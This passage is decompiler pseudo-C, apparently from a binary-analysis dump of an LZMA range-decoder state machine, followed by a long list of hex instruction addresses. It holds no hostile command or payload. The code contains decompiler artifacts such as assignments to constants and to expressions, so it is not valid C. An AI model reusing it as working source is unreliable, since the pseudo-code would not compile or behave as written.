								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                    0x00000000
                    0x00406d5f
                    0x00406d5f
                    0x00406d64
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x004073cb
                    0x004073cb
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00407441
                    0x00407441
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040741c
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x00000000
                    0x004075cf
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743e
                    0x00000000
                    0x0040743e
                    0x00406d66
                    0x00406d66
                    0x00406d6a
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406ff4
                    0x00406ff7
                    0x00406f9a
                    0x00406fa0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406ff9
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00000000
                    0x00406f97
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406ea3
                    0x00406ea6
                    0x00406e1d
                    0x00406e1d
                    0x00406e23
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f30
                    0x00406f33
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed3
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x0040710a
                    0x0040710a
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406eac
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x004075e5
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x004075fd
                    0x00407601
                    0x00407601
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00000000
                    0x00406e1a
                    0x00406ea6
                    0x00406daf
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00406bf2
                    0x00000000
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c5c
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x00000000
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x00000000
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407137
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x00000000
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x00000000
                    0x004073c8
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00000000
                    0x0040753b
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
